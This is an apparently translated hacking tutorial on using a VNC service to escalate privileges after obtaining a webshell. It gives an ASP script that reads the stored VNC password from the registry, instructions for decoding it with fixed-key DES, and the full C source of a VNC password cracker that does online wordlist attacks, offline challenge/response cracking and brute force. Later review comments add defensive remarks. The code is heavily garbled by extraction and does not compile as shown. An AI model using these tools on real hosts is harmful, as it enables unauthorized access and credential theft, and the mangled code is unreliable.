How to use VNC services to improve permissions


Author: flowers

Privilege escalation is usually done through Serv-U or by finding the SA account password. Besides those, VNC typically runs with the highest privileges, and it offers a graphical interface whose functionality is comparable to a remote terminal.

If you have obtained a WebShell on a host, want to escalate privileges, and find that the host runs a VNC service, you can consider the following method.

By default the VNC server keeps its password in the registry; what follows applies only to that situation.

First use ASP to read the encrypted password from the registry, then use the cracking tool to decode it.

Here is an ASP script that reads the VNC password. By default the VNC password is stored at HKCU\Software\ORL\WinVNC3\Password.

' Reads the WinVNC password value (a binary registry value) and echoes each
' byte as hex. The value is only obfuscated (fixed-key DES, see the C tool
' below), so read access to this registry key is equivalent to knowing the
' password. Defensive note: the controls that matter are the ACL on the key
' and the privilege level of the account a web application runs under; a
' stored VNC password should be considered exposed once the host is
' compromised. NOTE(review): the method name and the "/" separators in the
' key path are garbled by extraction.
SET WSHSHELL = Server.createObject ("wscript.shell")

BKEY = WSHSHELL.REGREGREGREGREAD ("HKCU / Software / Orl / WinVNC3 / Password")

' The value is a byte array; print each byte in hex for the decoder below.
For Each Str in BKey

Response.write HEX (STR)

NEXT

After reading it, the result is a hexadecimal string similar to 49 40 15 F9 A3 5E 8B 22; this is the password as encrypted by VNC. It can be decoded with VNCX4.

Using VNCX4 is very simple: at the command line enter

C: /> vncx4 -w

Then enter each of the hexadecimal bytes above, one per line, pressing Enter after each; when the last one is entered the result is printed.

For example, I give a test

H: / TOOL> VNCX4 -W

49

40

15

F9

A3

5E

8b

22

Entered Hex String: 49 40 15 F9 A3 5E 8B 22

VNC Password: 123456

OK, here are the source code and the compiled program of this tool; the compiled program is at the bottom.

/* Project Code: Vncrack for Windows (VNX4)
 *
 * FX
 * Phenoelit (http://www.phenoelit.de/)
 * (c) 2K
 *
 * Blocking delay idea by stonneway.
 */

#include

#include

#include

File: // # include

#include

#include "d3des.h"

#include "vncauth.h"

/* Fixed 8-byte DES key shared by the VNC sources; presumably defined in the
 * VNC authentication code that d3des.h / vncauth.h (included above) belong
 * to. Because this key is constant and public, a stored password
 * "encrypted" with it is merely obfuscated: whoever can read the ciphertext
 * can recover the plaintext (see interactive()). */
Extern UNSIGNED Char fixedkey [8];

/* Start-up banner. NOTE(review): the literal is split across two lines by
 * extraction and "/n" stands for "\n". */
#define splash "vncrackx4 - by Phenoelit)

http://www.phenoelit.de/)/n "

/* verbose: number of -v flags given (see main). lbf is not referenced
 * anywhere in the visible code. */
INT Verbose = 0, LBF = 0;

/* Hex-encoded challenge / response supplied with -c / -r for the offline
 * mode in cr_crack(); both stay NULL in online mode. */
Char * schallange = null, * SRESPONSE = NULL;

/* Forward declarations for the two non-online modes defined after main(). */
Void interactive (void);

Void Cr_crack (char * wordlist);

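/*
 * sec_malloc: allocate `size` zero-filled bytes or terminate the process.
 *
 * Every allocation in this program goes through here so that a failed
 * allocation exits instead of propagating NULL, and so that buffers start
 * zeroed — callers rely on the zero fill as a NUL terminator (for example
 * the 9-byte password buffer in interactive() and the 256-byte word buffer
 * that is read with fgets(..., 255, ...)).
 *
 * @param size  number of bytes to allocate; 0 is passed through unchanged
 *              and, depending on the C library, may yield NULL and abort.
 * @return      pointer to zeroed memory; ownership passes to the caller,
 *              who releases it with free().
 */
void *sec_malloc(size_t size) {
    /* calloc zero-fills in one call, replacing the malloc + memset pair */
    void *p = calloc(1, size);
    if (p == NULL) {
        /* %zu matches size_t; a %d here would be a mismatched conversion */
        fprintf(stderr, "malloc() failed for %zu bytes\n", size);
        exit(-1);
    }
    return p;
}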

/* Print the command-line help to stdout and exit(-1). NOTE(review): the
 * literals below are garbled by extraction — "/ n" is "\n", "/ t" is "\t",
 * the doubled "//" in the registry paths are escaped backslashes, and a
 * closing quote is missing after "by Phenoelit". The help documents the
 * online wordlist mode (-h host -w wordlist), the interactive decode of a
 * stored key, and the offline challenge/response mode (-c / -r). */
Void usage (void) {

Printf ("vncrackx4 / n"

"by Phenoelit

http://www.phenoelit.de/)/n/n"/

Usage: / n "

"Online: ./vncrack-h target.host.com -w wordlist.txt [-opt's] / n" "Windows Interactive Mode: ./vncrack -w / n"

"/ TENTER HEX Key One Byte Per Line - Find IT IN / N"

"/ t // hkey_current_user // Software // ORL // WinVNC3 // Password OR / N"

"/T//hKey_users//.default//software//orl//winvnc3//password/n/n"

"Options for online mode: / n"

"-V / tverbose (repeat -v for more) / n"

"-p p / tconnect to port p instead of 5900 / n"

"Options for phoss intercepted challages: / n"

"-c / tchallange from phoss output / n"

"-r / Tresponse from Phoss Output / N"

);

EXIT (-1);

}

/* Busy-wait for `ms` milliseconds by polling GetTickCount(). NOTE(review):
 * the listing shows "(t1 ms)" — presumably t1 + ms. This spins the CPU
 * instead of yielding. GetTickCount() is a 32-bit millisecond counter that
 * wraps around, so the "<" comparison misbehaves across a wrap. The include
 * lines above are garbled; if <windows.h> is among them this definition
 * collides with the Win32 Sleep() of the same signature. */
Void Sleep (DWORD MS) {

DWORD T1;

T1 = gettickcount ();

/* loop until the tick counter passes the start time plus the delay */
While (GettickCount () <(t1 ms));

}

/*
 * main: online mode. Parses the command line, then for every wordlist entry
 * opens a fresh TCP connection to the VNC server, completes the RFB
 * handshake (version string echoed back, 4-byte security type, 16-byte
 * challenge), sends vncEncryptBytes(challenge, word) and reads the result.
 * Offline (-c/-r) and interactive modes are dispatched from the option
 * switch and never return.
 *
 * NOTE(review): this listing is garbled by extraction — "/ n" stands for
 * "\n", the "+" of "++" and "+ 1" is missing ("Verbose ;", "strlen (...) 1",
 * "argv [ i]" is presumably argv[++i], "(Redocount )" is redocount++), and
 * the for-loop header at "For (i = 1; I switch" is collapsed. The comments
 * below describe intent; the text as shown does not compile.
 */
INT main (int Argc, char ** argv) {

Int sfd; / * socket * /

Unsigned long dest_ip;

Struct SockAddr_in dest_addr;

Char * RBUF;

UNSIGNED CHAR ATYPE [4];

Unsigned char challange [16];

Char * vnchost = NULL;

U_SHORT VNCPORT = 5900;

/* ani and conway (below) are never used in the visible body. */
INT I, ANI = 0;

Char * WordList = NULL;

File * fd;

Char * tryword;

Char Servertext [255];

Char * sthelp;

Int conway = 90;

/* redocount: retries so far for the current word after a server-side
 * disconnect; redosleep: seconds to wait before such a retry (-r). */
INT redocount = 0;

INT redosleep = 10;

/ * Check the command line options * /

/* Option parsing. Presumably "for (i = 1; i < argc; i++) switch (argv[i][1])".
 * Every argument is indexed at [1] without checking that argv[i][0] is '-';
 * an empty-string argument would read past its terminator. */
For (i = 1; I switch (argv [i] [1]) {

Case 'V': // Verbose

Verbose ;

Break;

/* -p: port. atoi() reports no error; "0" and non-numeric input both yield
 * 0 and are rejected below, but trailing garbage ("5900x") is accepted. */
Case 'P':

IF (argv [ i] == null) USAGE ();

IF ((vncport = ATOI (Argv [I])) == 0) {

FPrintf (stderr, "Wrong Port Number:% S / N", Argv [I]);

EXIT (-1);

}

Break;

/* -h: target address, copied into a heap buffer (strlen + 1 bytes). */
Case 'h':

IF (argv [ i] == null) USAGE ();

vnchost = (char *) sec_malloc (strlen (argv [i]) 1);

STRCPY (Vnchost, Argv [I]);

Break;

/* NOTE(review): the listing shows two "Case 'W'" and two "Case 'R'"
 * labels; letter case was lost in extraction, so the original presumably
 * distinguished -w/-W and -r/-R. Which is which cannot be read from here. */
Case 'W':

IF (argv [ i] == null) USAGE ();

WordList = (char *) sec_malloc (strlen (argv [i]) 1); strcpy (WordList, Argv [i]);

Break;

/* interactive() decodes a stored key from stdin and exit()s. */
Case 'W':

Interactive ();

Break;

/* -c / -r: hex challenge and response captured from a VNC handshake,
 * handed to cr_crack() below. */
Case 'C':

IF (argv [ i] == null) USAGE ();

SCHALLANGE = (char *) sec_malloc (strlen (argv [i]) 1);

STRCPY (Schallange, Argv [I]);

Break;

Case 'R':

IF (argv [ i] == null) USAGE ();

SRESPONSE = (char *) SEC_MALLOC (Strlen (Argv [i]) 1);

STRCPY (SRESPONSE, Argv [I]);

Break;

/* Retry delay in seconds; atoi() accepts 0 or negative here unchecked. */
Case 'R':

IF (argv [ i] == null) USAGE ();

RedOSleep = ATOI (Argv [i]);

Break;

DEFAULT:

USAGE ();

}

}

/* Offline mode: if a challenge or response was given, cr_crack() takes over
 * and never returns. */
IF (Schallange || SRESPONSE) {

Printf (Splash);

Cr_crack (wordlist); / * EXIT IS DONE Here * /

}

/* NOTE(review): garbled; presumably if (!(vnchost && vncport && wordlist)) usage(); */
IF (! ("(VNCHOST & VNCPORT && WordList) USAGE ();

Printf (Splash);

/ * Host * /

/* inet_addr() accepts a dotted quad only (no name resolution) and returns
 * INADDR_NONE for a bad string; that is not checked, so a typo surfaces
 * later as a connect() failure. */
Dest_ip = inet_addr (vnchost);

Memcpy (& DEST_ADDR.SIN_ADDR, & DEST_IP, SIZEOF (DEST_IP));

dest_addr.sin_port = htons (vncport);

dest_addr.sin_family = af_INet;

/ * Make Sure We Can Talk Winsock

Comment: i like to enclose this, Because IT is so ugly * /

/* WSAStartup must precede any socket call; there is no matching
 * WSACleanup() on any exit path. */
{

Word wversionRequested;

Wsadata wsadata;

Int Err;

WVersionRequested = MakeWord (1, 1);

Err = WSAStartup (WVersionRequested, & WSADATA);

IF (Err! = 0) {

FPRINTF (stderr, "unable to start networking);

EXIT (-1);

}

} // WSA and Go

IF ((fd = fopen (wordlist, "rt")) == NULL) {

FPrintf (stderr, "unable to open wordlist% s / n", wordlist);

EXIT (-1);

}

/* One candidate per line; fgets keeps the newline, which is stripped below
 * only if present. The buffer is zeroed by sec_malloc and again after each
 * attempt, so the word is always NUL-terminated. */
Tryword = sec_malloc (256);

While (FGETS (Tryword, 255, FD)! = null) {

/ * cut the word * /

IF (Tryword [strlen (tryword) -1] == '/ n') Tryword [strlen (tryword) -1] = '/ 0';

/* Re-entry point when the server closes the connection (case 0 below); a
 * new socket is opened for every word and for every retry. */
RedoClosed:

IF (verbose) {

Printf ("/ NTRYING '% s' ...", tryword);

Fflush (stdout);

}

/* NOTE(review): garbled; presumably socket(AF_INET, SOCK_STREAM, 0). */
IF ((SFD = Socket, Sock_Stream, 0) == Invalid_socket) {fprintf (stderr, "unable to get a socket);

EXIT (-1);

}

IF (Connect (SFD, STRUCT SOCKADDR *) & DEST_ADDR, SIZEOF (DEST_ADDR))! = 0) {

FPRINTF (stderr, "Connect Failed (% D) ./ n", wsagetlasterror ());

EXIT (-1);

}

/ * CONNUNICATION STARTS with Server-> Client Version Packet * /

/* NOTE(review): rbuf is allocated on every iteration and never freed (100
 * bytes leaked per word and per retry). recv() does not NUL-terminate: the
 * strlen() below relies on sec_malloc's zero fill and on the reply being
 * shorter than 100 bytes, and a return of 0 (peer closed) is not treated as
 * an error. */
RBUF = SEC_Malloc (100);

IF (RECV (SFD, RBUF, 100, 0) <0) {

FPRINTF (stderr, "rv ()");

EXIT (-1);

}

IF (Verbose> 1) Printf ("/ Nserver Protocol Version:% S", RBUF);

/ * BOUNCE this message back - so the server will pay suline * /

/* The server's version string is echoed back verbatim as the client
 * version ("SND" is presumably send). */
IF (SND (SFD, RBUF, Strlen (RBUF), 0) <0) {

FPRINTF (STDERR, "Send ()");

EXIT (-1);

}

/* Security type. RFB 3.3 sends it as a 4-byte big-endian value; only the
 * low byte (atype[3]) is examined below. */
IF (RECV (SFD, Atype, Sizeof (atype), 0) <0) {

FPRINTF (stderr, "rv ()");

EXIT (-1);

}

IF (Verbose> 1) {

Printf ("Authentication Type:");

For (i = 0; i <4; i ) {Printf ("% x", atype [i]);

Printf ("/ n");

}

Switch (atype [3]) {

/* 0 = connection failed; the server follows with a reason string. This is
 * the server-side lockout after repeated failures (the "blocking delay" of
 * the file header): the code sleeps redosleep seconds and retries the same
 * word up to three times before giving up. For defenders, that lockout is
 * the control that throttles this loop, and the resulting traffic pattern —
 * bursts of short-lived connections to the VNC port separated by fixed
 * pauses — together with the server's own failed-auth log entries is what
 * to alert on. */
Case 0:

FPRINTF (stderr, "server told me: connection close / n");

IF (verbose) {

// Try to Retrieve The Reason

MEMSET (ServerText, 0, SizeOf (ServerText));

IF (RECV (SFD, ServerText, SizeOf (ServerText), 0) <0) {

FPRINTF (stderr, "rv () in verbose");

EXIT (-1);

} else {

/* The reason text is preceded by a 4-byte length field; "STHELP = 4" is
 * presumably sthelp += 4 to skip it. A reply shorter than 4 bytes is not
 * checked for. */
STHELP = ServerText;

STHELP = 4;

FPRINTF (stderr, "server says:% s / n", sthelp);

}

/* NOTE(review): garbled; presumably a printf of "\twaiting for blocking disable\n". */
IF ("/ TWAITI for Blocking Disable / N");

SLEEP (RedOSleep * 1000);

IF ((Redocount ) <3) {

Goto redoclosed;

} else {

FPRINTF (stderr, "/ tgiving up (increase -r) / n");

}

}

/* Note that without -v the retry block above is skipped entirely and the
 * first disconnect ends the run. */
EXIT (-1);

Break; / * NOT Reached * /

/* 1 = no authentication: the server accepts any client — a
 * misconfiguration that deserves attention in its own right. */
Case 1:

Printf ("/ N >>>>>>>>>>>>>> / N"

"Server Does Not Require Authentication! / N" >>>>>>>>>>>>> / N ");

EXIT (-1);

Break; / * NOT Reached * /

/* 2 = classic VNC authentication (DES challenge/response). */
Case 2:

IF (Verbose> 1)

Printf ("Authentication Type 'VNC Authentication' - Fine / N");

Break;

DEFAULT:

FPRINTF (stderr, "unknown authentication requested by server / n");

EXIT (-1);

}

Redocount = 0;

/* 16-byte challenge. The expected response is DES over this block keyed by
 * the password (vncEncryptBytes), with no salt or session binding — which
 * is why a single captured challenge/response pair is enough for the
 * offline mode in cr_crack(). */
IF (RECV (SFD, Challange, Sizeof (Challange), 0) <0) {

FPRINTF (stderr, "rv ()");

EXIT (-1);

}

IF (Verbose> 1) {

Printf ("Challange:");

For (i = 0; i <16; i ) {printf ("% x", challange [i]);

Printf ("/ n");

}

/ * ENCRYPT Challange with the password and send it to the server * /

VncencryptBytes (Challange, Tryword);

/* NOTE(review): garbled; presumably send(sfd, challange, sizeof(challange), 0). */
IF (SFD, CHALLANGE, SIZEOF (CHALLANGE), 0) <0) {

FPRINTF (stderr, "auth send ()");

EXIT (-1);

}

/* Authentication result, again read as 4 bytes with only the low byte used:
 * 0 ok, 1 failed, 2 too many attempts. atype[3] is cleared first so a short
 * read cannot leave the previous value in place. */
Atype [3] = 0;

IF (RECV (SFD, Atype, Sizeof (atype), 0) <0) {

FPrintf (stderr, "auth rec ()");

EXIT (-1);

}

Switch (atype [3]) {

Case 0:

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>>>> / n ", tryword);

Free (Tryword);

exit (0);

Break; / * NOT Reached * /

Case 1: / * 'Normal' Failed * /

IF (Verbose) Printf ("failed / n");

Break;

/* 2 = the server is throttling; wait 10 s using the busy-wait Sleep()
 * defined above, then move on to the next word. */
Case 2: / * Too Many * /

Printf ("Server IS Angry, Waiting for Calm Down ... / N");

Sleep (10000);

Break;

DEFAULT:

FPRINTF (stderr, "unknown response / n");

EXIT (-1);

}

/* Tear down this attempt's connection and zero the word buffer; rbuf
 * allocated above is not released here. */
Shutdown (SFD, 2);

CloseSocket (SFD);

MEMSET (Tryword, 0,256);

}

/* Wordlist exhausted without a match. */
Free (Tryword);

Fclose (FD);

Return 0;

}

/*
 * interactive: decode a stored WinVNC password. Reads 8 bytes as hex from
 * stdin (one per line), prints them back, then performs one DES decryption
 * (deskey(fixedkey, DE1); des(pass, pass)) with the fixed key declared at
 * file scope and prints the plaintext.
 *
 * Defensive note: because the key is constant and the same in every VNC
 * build, the registry value is obfuscated, not encrypted — read access to
 * the value is equivalent to knowing the password. Protect the ACL on the
 * registry key and the privilege level of the account a web server runs
 * under, and treat a stored VNC password as disclosed once a host is
 * compromised.
 *
 * NOTE(review): "% x" is "%x" and "i )" is "i++" in this extraction.
 */
Void interactive (void) {

UNSIGNED Char * Pass;

INT I;

/* NOTE(review): scanf("%x") stores an unsigned int, but &c is a char* —
 * the write overruns c (undefined behaviour). The scanf return value is
 * also unchecked, so non-hex input silently repeats the previous byte. */
Char C;

/* 9 bytes: 8 for the key material plus the zero fill from sec_malloc that
 * terminates the "%s" below. The (char *) cast mismatches the unsigned
 * char* declaration. */
Pass = (char *) sec_malloc (9);

For (i = 0; i <8; i ) {scanf ("% x", & c);

Pass [i] = C;

}

Printf ("Entered Hex String:");

For (i = 0; i <8; i ) {Printf ("% x", pass [i]);}

Printf ("/ n");

/* DE1 selects decryption; the ciphertext is decrypted in place. */
Deskey (FixedKey, DE1);

DES (Pass, pass);

Printf ("VNC Password:% S / N", PASS);

exit (0);

}

/*
 * cr_crack: offline mode. Takes a 16-byte challenge and the client's 16-byte
 * response (each as 32 hex characters, captured from a VNC handshake on the
 * wire) and searches for a password p with vncEncryptBytes(challenge, p) ==
 * response: first every line of the wordlist, then exhaustive enumeration
 * over cset1 for lengths 1 through 8 (bft[9] — matching the 8-byte DES key
 * VNC derives from the password). No network access is involved; the
 * function exit()s on success and after the search is exhausted.
 *
 * Defensive note: this works because classic VNC authentication is an
 * unsalted DES challenge/response with the password as the key and no
 * binding to the session, so one passively captured handshake is enough for
 * offline guessing. The mitigation is not a longer password (the key is
 * capped at 8 bytes) but keeping this exchange off untrusted networks —
 * tunnel VNC over SSH/VPN or use a VNC variant with encrypted, modern
 * authentication — and alerting on VNC sessions from unexpected sources.
 *
 * NOTE(review): the listing is garbled by extraction — "/ n" is "\n",
 * "CRL 1" is CRL + 1, "J = 2" is presumably j += 2, and every for-loop
 * header has lost its condition and increment (the brute-force headers are
 * presumably "cnt[k] < cset1_len; cnt[k]++"). The comments describe intent.
 */
Void cr_crack (char * wordlist) {

INT I, J;

/* 16-byte challenge/response; each buffer gets one extra zeroed byte. */
#define CRL 16

Char CHL [CRL 1];

Char RSP [CRL 1];

Char Tchl [CRL 1];

/* two hex digits plus NUL, used to decode one byte at a time */
Char TS [3];

File * fd;

Char * tryword;

/* brute-force candidate; bft[len] is kept at NUL so it is always a string */
CHAR BFT [9];

/* Brute-force alphabet. NOTE(review): the listing shows the same mixed-case
 * string twice — presumably lowercase then uppercase in the original, with
 * the symbol string's escapes garbled as well. cset1_len (92) below is the
 * author's count and is not re-derived here. */
Char cset1 [] =

"AbcdefghijklmnopQrstuvwxyz"

"AbcdefghijklmnopQrstuvwxyz"

"1234567890! /" $% & / () =? `'' * _:; -., # }] [{^ <> | / 0";

#define cset1_len (92)

/* cnt[k] indexes cset1 for candidate position k. NOTE(review): t1/t2 are
 * declared time_t but assigned from GetTickCount(), a DWORD in ms. */
INT CNT [8];

TIME_T T1, T2;

/* Argument validation: a wordlist is mandatory even though brute force
 * follows; both -c and -r must be present and exactly 32 hex digits each. */
IF (! WordList) {

FPRINTF (stderr, "supply wordlist file!");

EXIT (-1);

}

IF ((! Schallange) || (! SRESPONSE)) {

USAGE ();

}

/* NOTE(review): "IF" and its condition are split across lines by extraction. */
IF

(Strlen (Schallange)! = 16 * 2)

|| (Strlen (SRESPONSE)! = 16 * 2)

) {

FPRINTF (stderr,

"Challange and response Have to be 32 characters each / n");

EXIT (-1);

}

MEMSET (& CHL, 0, CRL 1);

MEMSET (& TCHL, 0, CRL 1);

MEMSET (& RSP, 0, CRL 1);

MEMSET (& TS, 0, 3);

/* Decode the hex pairs. strtol(ts, NULL, 16) maps a non-hex pair to 0
 * without any error, so malformed input is silently accepted; only the
 * length was validated above. */
J = 0;

For (i = 0; I Strncpy (TS, & Schallange [J], 2);

CHL [I] = (unsigned char) STRTOL (TS, NULL, 16);

STRNCPY (TS, & SRESPONSE [J], 2);

RSP [I] = (unsigned char) Strtol (TS, NULL, 16);

J = 2;

}

IF (verbose) {

Printf ("Challange:");

For (i = 0; i printf ("% x", (unsigned char) chl [i]);

}

Printf ("/ n");

Printf ("Response:");

/* NOTE(review): the duplicated ("% x", is an extraction artefact. */
For (i = 0; i printf ("% x", ("% x", (unsigned char) RSP [I]);

}

Printf ("/ n");

}

/* Phase 1: wordlist. */
IF ((fd = fopen (wordlist, "rt")) == NULL) {

FPRINTF (stderr, "could not open wordlist / n");

EXIT (-1);

}

/* NOTE(review): unlike main(), the last character is dropped
 * unconditionally, so a final line without a newline loses its last
 * character. */
Tryword = sec_malloc (256); while (fgets (tryword, 255, fd)! = null) {

Tryword [Strlen (Tryword) -1] = '/ 0';

/ * TRY THIS WORD * /

/* Encrypt a fresh copy of the challenge under this word and compare with
 * the captured response — this comparison is the whole check. */
Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, Tryword);

IF (Verbose> 1) {

For (i = 0; i printf ("% x", ("% x", (unsigned char) RSP [I]);

}

Printf ("/ n");

For (i = 0; i printf ("% x", (unsigned char) TCHL [I]);

}

Printf ("/ n");

}

IF (! Memcmp (TCHL, RSP, CRL) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>>>> / n ", tryword);

Free (Tryword);

exit (0);

} else {

IF (Verbose) Printf ("% s failed / n", tryword);

}

MEMSET (Tryword, 0,256);

}

Fclose (FD);

Free (Tryword);

/* Phase 2: exhaustive search, shortest candidates first. Each depth block
 * is a literal copy of the previous one with one more nested loop; only
 * the terminator position bft[len] and the banner differ. */
Printf ("--------------------------------- / n"

"WordList Failed - Going Brute Force / N"

"----------------------------- / n");

T1 = gettickcount ();

BFT [8] = '/ 0';

BFT [1] = '/ 0';

Printf ("/ tdepth I / n");

For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];

IF (Verbose)

Printf ("try:% s / n", bft);

Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

BFT [2] = '/ 0';

Printf ("/ TDepth II / N");

For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];

For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];

IF (Verbose)

Printf ("try:% s / n", bft);

Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>>>> / N" "Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

} // for 1

/ ************ /

BFT [3] = '/ 0';

Printf ("/ TDepth III / N");

For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];

For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];

For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];

IF (Verbose)

Printf ("try:% s / n", bft);

Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

} // for 1

} // for 2

/ ************ /

BFT [4] = '/ 0';

Printf ("/ tdepth IV / n");

For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];

For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];

For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];

For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];

IF (Verbose)

Printf ("try:% s / n", bft);

Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

} // for 1

} // for 2

} // for 3

/ ************ /

BFT [5] = '/ 0';

Printf ("/ tdepth v / n");

For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];

For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];

For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];

For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]]; for (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0] ];

IF (Verbose)

Printf ("try:% s / n", bft);

Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

} // for 1

} // for 2

} // for 3

} // for 4

/ ************ /

BFT [6] = '/ 0';

Printf ("/ tdepth vi / n");

For (CNT [5] = 0; CNT [5] bft [5] = cset1 [CNT [5]];

For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];

For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];

For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];

For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];

For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];

IF (Verbose)

Printf ("try:% s / n", bft);

Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

} // for 1

} // for 2

} // for 3

} // for 4

} // for 5

/ ************ /

BFT [7] = '/ 0';

Printf ("/ tdepth vii / n");

For (CNT [6] = 0; CNT [6] bft [6] = cset1 [CNT [6]];

For (CNT [5] = 0; CNT [5] bft [5] = cset1 [CNT [5]];

For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];

For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];

For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];

For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];

For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];

IF (Verbose)

Printf ("try:% s / n", bft); MEMCPY (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

} // for 1

} // for 2

} // for 3

} // for 4

} // for 5

} // for 6

/ ************ /

BFT [8] = '/ 0';

Printf ("/ tdepth viii / n");

For (CNT [7] = 0; CNT [7] bft [7] = cset1 [CNT [7]];

For (CNT [6] = 0; CNT [6] bft [6] = cset1 [CNT [6]];

For (CNT [5] = 0; CNT [5] bft [5] = cset1 [CNT [5]];

For (CNT [4] = 0; CNT [4] bft [4] = cset1 [CNT [4]];

For (CNT [3] = 0; CNT [3] bft [3] = cset1 [CNT [3]];

For (CNT [2] = 0; CNT [2] bft [2] = cset1 [CNT [2]];

For (CNT [1] = 0; CNT [1] bft [1] = cset1 [CNT [1]];

For (CNT [0] = 0; CNT [0] bft [0] = cset1 [CNT [0]];

IF (Verbose)

Printf ("try:% s / n", bft);

Memcpy (TCHL, CHL, CRL);

VncencryptBytes (TCHL, BFT);

IF (! Memcmp (TCHL, RSP, 16)) {

Printf ("/ N >>>>>>>>>>>>>> / N"

"Password:% S / N"

">>>>>>>>>>>>>> / N ",

BFT);

exit (0);

}

} // for 0

} // for 1

} // for 2

} // for 3

} // for 4

} // for 5

} // for 6

} // for 7

/* NOTE(review): (t2 - t1) / 63 is integer arithmetic on the tick values
 * passed to a %f conversion — a mismatched format argument (undefined
 * behaviour) — and the divisor 63 is not explained anywhere in the file. */
T2 = gettickcount ();

Printf ("DEPTH VIII (% 20.4F WPS) / N", (T2-T1) / 63);

Printf ("Not in Character Set! / N");

exit (0);

}

